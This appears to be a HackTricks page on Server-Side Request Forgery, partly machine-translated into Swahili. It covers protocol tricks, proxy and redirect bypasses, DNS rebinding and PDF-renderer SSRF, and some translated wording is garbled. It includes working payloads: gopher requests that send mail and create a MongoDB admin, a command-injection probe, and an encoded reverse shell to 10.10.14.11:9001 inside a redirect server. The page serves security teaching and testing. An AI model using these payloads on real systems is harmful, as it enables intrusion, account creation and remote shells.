SSRF (Server Side Request Forgery)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Udhaifu wa Server-side Request Forgery (SSRF) hutokea wakati mshambulizi anavyotumia programu upande wa seva ili itume HTTP requests kwa domain anayotaka. Udhaifu huu unaweka seva katika hatari ya maombi ya nje yaliyoamriwa na mshambulizi.

Kukamata SSRF

Kitu cha kwanza unachopaswa kufanya ni kukamata mwingiliano wa SSRF ulioumba wewe. Ili kukamata mwingiliano wa HTTP au DNS unaweza kutumia zana kama:

Burp Collaborator
pingb
canarytokens
interractsh
http://webhook.site
https://github.com/teknogeek/ssrf-sheriff
http://requestrepo.com/
https://github.com/stolenusername/cowitness
https://github.com/dwisiswant0/ngocok - A Burp Collaborator using ngrok

Whitelisted Domains Bypass

Kawaida utagundua kuwa SSRF inafanya kazi tu katika certain whitelisted domains au URL. Katika ukurasa ufuatao una compilation of techniques to try to bypass that whitelist:

URL Format Bypass

Bypass via open redirect

Ikiwa seva imehifadhiwa vizuri unaweza bypass all the restrictions by exploiting an Open Redirect inside the web page. Kwa sababu ukurasa wa wavuti utaruhusu SSRF to the same domain na pengine utatekeleza follow redirects, unaweza kutumia Open Redirect to make the server to access internal any resource.
Soma zaidi hapa: https://portswigger.net/web-security/ssrf

Protokoli

file://
Mpangilio wa URL file:// unatajwa, ukielekeza moja kwa moja kwa /etc/passwd: file:///etc/passwd
dict://
Mpangilio wa URL wa DICT unaelezewa kutumika kwa kufikia ufafanuzi au orodha za maneno kupitia protocol ya DICT. Mfano unaonyesha URL iliyojengwa inayolenga neno maalum, database, na nambari ya kipengele, pamoja na mfano wa script ya PHP ambayo inaweza kutumiwa vibaya kuunganishwa na server ya DICT kwa kutumia credentials zinazotolewa na mshambulizi: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
SFTP://
Inatambulika kama protocol ya uhamishaji wa faili salama juu ya secure shell, mfano unaonyeshwa kuonyesha jinsi script ya PHP inaweza kutumika vibaya kuunganishwa na SFTP server hatarishi: url=sftp://generic.com:11111/
TFTP://
Trivial File Transfer Protocol, inayofanya kazi juu ya UDP, inatajwa pamoja na mfano wa script ya PHP iliyoundwa kutuma ombi kwa TFTP server. Ombi la TFTP limefanywa kwa ‘generic.com’ kwenye port ‘12346’ kwa faili ‘TESTUDPPACKET’: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
LDAP://
Sehemu hii inashughulikia Lightweight Directory Access Protocol, ikisisitiza matumizi yake kwa ajili ya kusimamia na kufikia huduma za taarifa za directory zilizogawanywa kwa mitandao ya IP. Weza kuingiliana na LDAP server kwenye localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
SMTP
Inabainishwa mbinu ya kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikiwa ni pamoja na hatua za kufichua majina ya ndani ya domain na hatua za uchunguzi zaidi kulingana na taarifa hiyo.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect

Curl URL globbing - WAF bypass
Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kuwa muhimu ili bypass WAFs. Kwa mfano katika writeup unaweza kupata mfano huu wa path traversal via file protocol:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

Gopher://
Uwezo wa protocol ya Gopher kubainisha IP, port, na bytes kwa mawasiliano na server unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa kutengeneza payloads. Matumizi mawili tofauti yanaonyeshwa:

Gopher://

Kwa kutumia protocol hii unaweza kubainisha IP, port and bytes unayotaka server isend. Kisha, unaweza kimsingi exploit SSRF ili communicate with any TCP server (lakini unahitaji kujua jinsi ya kuzungumza na service kwanza).
Kwa bahati nzuri, unaweza kutumia Gopherus kuunda payloads kwa services mbalimbali. Zaidi ya hayo, remote-method-guesser inaweza kutumika kuunda gopher payloads kwa huduma za Java RMI.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — Back connect to 1337

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB – Unda mtumiaji mwenye username=admin na password=admin123 na permission=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

SSRF kupitia Referrer header & Nyingine

Software za analytics kwenye servers mara nyingi huandika Referrer header ili kufuatilia viungo vinavyokuja, desturi ambayo kwa bahati mbaya inafunua applications kwa ajili ya Server-Side Request Forgery (SSRF) vulnerabilities. Hii ni kwa sababu software kama hiyo inaweza kutembelea URLs za nje zilizotajwa katika Referrer header ili kuchambua maudhui ya tovuti inayorefer. Ili kugundua vulnerabilities hizi, plugin ya Burp Suite “Collaborator Everywhere” inapendekezwa, ikitumia jinsi zana za analytics zinavyoshughulikia Referer header ili kutambua potential SSRF attack surfaces.

SSRF kupitia data za SNI kutoka kwenye cheti

Usanidi usio sahihi unaoweza kuruhusu muunganisho kwa backend yoyote kupitia usanidi rahisi unaonyeshwa na mfano wa usanidi wa Nginx:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

Katika usanidi huu, thamani kutoka kwenye uwanja wa Server Name Indication (SNI) inatumiwa moja kwa moja kama anwani ya backend. Usanidi huu unaweka wazi udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumiwa kwa kuainisha tu anwani ya IP au jina la domain unalotaka katika uwanja wa SNI. Mfano wa exploitation ili kulazimisha muunganisho kwa backend yoyote, kama internal.host.com, ukitumia amri ya openssl, umeonyeshwa hapa chini:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF kupitia TLS AIA CA Issuers (Java mTLS)

Baadhi ya stack za TLS zinaweza kupakua kiotomatiki CA za kati zilizokosekana kwa kutumia Authority Information Access (AIA) → CA Issuers URI ndani ya cheti cha peer. Katika Java, kuwasha -Dcom.sun.security.enableAIAcaIssuers=true wakati huduma ya mTLS inapoendeshwa husababisha server kutofuatilia (dereference) URI zinazodhibitiwa na mshambuliaji kutoka kwenye cheti la mteja wakati wa handshake, kabla ya mantiki yoyote ya HTTP kuanza.

Mahitaji: mTLS imewezeshwa, Java AIA fetching imewezeshwa, mshambuliaji anaweza kuwasilisha cheti la mteja lenye AIA CA Issuers URI iliyotengenezwa.
Kusababisha SSRF (mfano wa Java 21):

java -Djava.security.debug=certpath \
-Dcom.sun.security.enableAIAcaIssuers=true \
-Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem

Matokeo ya debug ya certpath ya Java yanaonyesha CertStore URI:http://localhost:8080, na nc inakamata ombi la HTTP lenye User-Agent linaloweza kudhibitiwa kutoka -Dhttp.agent, ikithibitisha SSRF wakati wa uhakiki wa cheti.

DoS via file://: kuweka AIA CA Issuers kuwa file:///dev/urandom kwenye host zinazofanana na Unix kunafanya Java kuitendea kama CertStore na kusoma bytes nasibu zisizo na mipaka, ikifanya core ya CPU ichukue kazi na kuzuia muunganisho unaofuata hata baada ya mteja kuachana.

SSRF via CSS Pre-Processors

LESS ni pre-processor maarufu wa CSS ambao unaongeza variables, mixins, functions na directive yenye nguvu @import. Wakati wa compilation engine ya LESS itakuwa inakichukua rasilimali zilizotajwa katika taarifa za @import na kuingiza (“inline”) yaliyomo ndani yao katika CSS inayotokana wakati chaguo la (inline) linapotumika.

Check how to exploit it in:

LESS Code Injection

Wget file upload

SSRF with Command Injection

Inaweza kustahili kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDFs Rendering

Ikiwa ukurasa wa wavuti unaunda PDF kiotomatiki kwa taarifa ulizotoa, unaweza kuingiza JS itakayotekelezwa na muundaji wa PDF mwenyewe (the server) wakati wa kuunda PDF na utaweza kutumia SSRF. Find more information here.

From SSRF to DoS

Tengeneza vikao kadhaa na ujaribu kupakua faili nzito ukiitumia SSRF kutoka vikao hivyo.

SSRF PHP Functions

Angalia ukurasa ufuatao kwa functions za PHP hatarishi na hata za Wordpress:

PHP SSRF

SSRF Redirect to Gopher

Kwa baadhi ya mbinu za kushambulia unaweza kuhitaji kutuma jibu la redirect (inawezekana ili kutumia protocol tofauti kama gopher). Hapa kuna code mbalimbali za python za kujibu kwa redirect:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Proxies zisizopangwa ipasavyo kwa SSRF

Mbinu from this post.

Flask

Flask proxy vulnerable code

```python from flask import Flask from requests import get

app = Flask(‘main’) SITE_NAME = ‘https://google.com’

@app.route(‘/’, defaults={‘path’: ‘’}) @app.route(‘/path:path’)

def proxy(path): return get(f’{SITE_NAME}{path}’).content

if name == “main”: app.run(threaded=False)

</details>

Flask inaruhusu kutumia **`@`** kama tabia ya mwanzo, ambayo inaruhusu kufanya **jina la mwenyeji la awali kuwa jina la mtumiaji** na kuingiza jina jipya. Ombi la shambulio:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Msimbo wenye udhaifu:

Iligunduliwa kuwa inawezekana kuanza njia ya ombi kwa herufi ; ambayo inaruhusu kisha kutumia @ na kuingiza host mpya ya kufikiwa. Ombi la shambulio:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

PHP Built-in Web Server

Msimbo dhaifu wa PHP

```php

$proxy_site = $site.$current_uri; var_dump($proxy_site);

echo “\n\n”;

$response = file_get_contents($proxy_site); var_dump($response); ?>

</details>

PHP inaruhusu matumizi ya **char `*` kabla ya slash katika path** ya URL, hata hivyo ina vikwazo vingine, kama vile inaweza kutumika tu kwa pathname ya mzizi `/` na nukta `.` haziruhusiwi kabla ya slash ya kwanza, kwa hivyo inahitajika kutumia anwani ya IP iliyosimbwa kwa hex bila nukta, kwa mfano:
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

Reverse proxies zinazokubali absolute URLs katika request line (open forward-proxy)

Baadhi ya reverse proxies pia zinakubali absolute-form request lines (GET http://10.0.0.5:8080/path HTTP/1.1) na kupeleka URL kama ilivyo kwa backend badala ya kukataa au kuibadilisha kwenda configured upstream. Hii inageuza reverse proxy kuwa pre-auth forward proxy with full-read SSRF, ikiwemo upatikanaji wa huduma zilizo-bind kwenye localhost ambazo kawaida zingekuwa hazipatikani kutoka Internet.

Key points:

Request line controls destination: authority katika absolute URL inazusha routing ya kawaida; Host header kawaida haizingatiwi.
Full response returned: majibu kutoka kwa internal hosts yanarushwa nyuma kwa stream, hivyo unaweza kuorodhesha na kuingiliana (mfano, SOAP/Axis2, Keycloak, admin consoles) badala ya kufanyia blind-probing.
Works on localhost: GET http://127.0.0.1:port/ HTTP/1.1\r\nHost: public-host\r\n\r\n inatosha kugonga loopback-only listeners.
Abuse as pivot: changanya na vulns nyingine (mfano, upload endpoints) kufikia intra-host services.

Minimal probe:

GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close

Ikiwa unaona response ya upstream badala ya 400, appliance inafanya kazi kama open proxy.

DNS Rebidding CORS/SOP bypass

Ikiwa unapata matatizo ya ku-exfiltrate content kutoka kwa local IP kwa sababu ya CORS/SOP, DNS Rebidding inaweza kutumika kuzuia hitilafu hiyo:

CORS - Misconfigurations & Bypass

Automated DNS Rebidding

Singularity of Origin ni tool ya kufanya DNS rebinding attacks. Inajumuisha components zinazohitajika ku-rebind IP address ya attack server DNS name hadi IP ya target machine na ku-serve attack payloads ili ku-exploit software iliyo vulnerable kwenye target machine.

Tazama pia server ya umma inayokimbia kwenye http://rebind.it/singularity.html

DNS Rebidding + TLS Session ID/Session ticket

Mahitaji:

SSRF
Outbound TLS sessions
Stuff on local ports

Shambulio:

Muombe mtumiaji/bot afike kwenye domain inayodhibitiwa na attacker
TTL ya DNS iko 0 sec (hivyo victim atatafuta IP ya domain tena hivi karibuni)
Connection ya TLS inaanzishwa kati ya victim na domain ya attacker. Attacker anaweka payload ndani ya Session ID au Session Ticket.
Domain itaanzisha infinite loop ya redirects dhidi ya domain yenyewe. Lengo ni kufanya mtumiaji/bot afikie domain hadi itafanya tena DNS request ya domain.
Katika DNS request sasa anapewa private IP (mfano 127.0.0.1)
Mtumiaji/bot atajaribu kurekebisha TLS connection na ili kufanya hivyo atatuma tena Session ID/Ticket ID (ambapo payload ya attacker ilikuwepo). Kwa hivyo hongera — umefanikisha kumuomba mtumiaji/bot ajishambulishe mwenyewe.

Kumbuka kwamba wakati wa shambulio hili, kama unataka kushambulia localhost:11211 (memcache) unahitaji kufanya victim aanzishe connection ya awali na www.attacker.com:11211 (port lazima iwe ile ile kila wakati).
Ili kufanya shambulio hili unaweza kutumia tool: https://github.com/jmdx/TLS-poison/
Kwa maelezo zaidi angalia talk ambapo shambulio hili limefafanuliwa: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Tofauti kati ya blind SSRF na isiyo blind ni kwamba kwenye blind huwezi kuona response ya SSRF request. Hivyo, ni vigumu zaidi ku-exploit kwa sababu utaweza ku-exploit tu vulnerabilities zilizojulikana vizuri.

Time based SSRF

Kwa kukagua muda wa responses kutoka server inaweza kuwa inawezekana kujua kama resource ipo au la (labda inachukua muda zaidi kufikia resource iliyopo kuliko kufikia ile isiyoipo)

From blid to full abusing status codes

Kulingana na blog post, baadhi ya blind SSRF zinaweza kutokea kwa sababu hata kama targeted URL inarudisha 200 status code (kama AWS metadata), data hiyo haiko katika format sahihi na kwa hivyo app inaweza kukataa kuionyesha.

Hata hivyo, imegunduliwa kwamba kutuma responses za redirect kutoka 305 hadi 309 katika SSRF kunaweza kufanya app ifuate redirects hizi wakati inapoingia katika error mode iliyosababisha isiyaboresha tena format ya data na inaweza tu ku-print data hiyo.

The python server used to exploit this is th following:

@app.route("/redir")
def redir():
count = int(request.args.get("count", 0)) + 1
# Pump out 305, 306, 307, 308, 309, 310 ...
weird_status = 301 + count
if count >= 10:                      # after 5 “weird” codes
return redirect(METADATA_URL, 302)
return redirect(f"/redir?count={count}", weird_status)

@app.route("/start")
def start():
return redirect("/redir", 302)

Hatua:

Kwanza 302 hufanya app ianze kufuata.
Kisha inapata 305 → 306 → 307 → 308 → 309 → 310.
Baada ya code ya 5 isiyo ya kawaida PoC hatimaye inarejesha 302 → 169.254.169.254 → 200 OK.

Nini kinatokea ndani ya target:

libcurl yenyewe hufuata 305–310; inabadilisha misimbo isiyojulikana kuwa “follow.”
Baada ya N weird redirects (≥ 5 hapa) wrapper ya application yenyewe inaamua “something is off” na inaingia katika error mode iliyokusudiwa kwa debugging.
Katika mode hiyo inadumps redirect chain nzima pamoja na final body na kuirudisha kwa outside caller.
Matokeo: attacker anaona every header + the metadata JSON, mission accomplished.

Kumbuka kwamba hii ni ya kuvutia kwa leak status codes ambazo hukuweza leak hapo awali (kama 200). Hata hivyo, ikiwa kwa namna fulani unaweza pia kuchagua status code ya response (fikiria unaweza kuamua kwamba AWS metadata inajibu kwa status code 500), huenda kuna status codes ambazo zinaleak moja kwa moja yaliyomo ya response.

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>

TCPDF 6.10.0 inatoa majaribio kadhaa ya upokeaji kwa kila rasilimali ya <img>, hivyo payload moja inaweza kuzalisha maombi mengi (inayosaidia kwa timing-based port scans).
html2pdf inakopi tabia ya TCPDF kwa <img> na inaongeza CSS fetching ndani ya Css::extractStyle(), ambayo kwa urahisi inaitisha file_get_contents($href) baada ya ukaguzi mdogo wa scheme. Tumia vibaya kuwasiliana na loopback services, RFC1918 ranges, au cloud metadata endpoints.
Changanya SSRF primitive hii na HTML-to-PDF path traversal tricks ili leak majibu za ndani za HTTP na faili za ndani zilizotengenezwa ndani ya PDF.

Wahardeners wanapaswa kuondoa URLs za nje kabla ya rendering au kuweka renderer katika network sandbox; hadi wakati huo, chukulia PDF generators kama blind SSRF proxies.

Utekelezaji wa SSRF kwenye cloud

Kama utapata udhaifu wa SSRF kwenye mashine inayotekelezwa ndani ya mazingira ya cloud, unaweza kupata taarifa za kuvutia kuhusu mazingira ya cloud na hata credentials:

Cloud SSRF

Majukwaa yenye udhaifu wa SSRF

Majukwaa kadhaa yanayotambuliwa ambayo yana au yalikuwa na udhaifu wa SSRF; angalia huko:

SSRF Vulnerable Platforms

Zana

SSRFMap

Chombo cha kugundua na kutumia udhaifu za SSRF

Gopherus

Blog post on Gopherus

Chombo hiki huunda Gopher payloads kwa:

MySQL
PostgreSQL
FastCGI
Redis
Zabbix
Memcache

remote-method-guesser

Blog post on SSRF usage

remote-method-guesser ni skana ya udhaifu ya Java RMI inayounga mkono operesheni za mashambulizi kwa udhaifu wa kawaida wa Java RMI. Operesheni nyingi zinazopatikana zinaunga mkono chaguo la --ssrf ili kuzalisha SSRF payload kwa operesheni inayohitajika. Pamoja na chaguo la --gopher, gopher payloads tayari za kutumia zinaweza kuzalishwa moja kwa moja.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
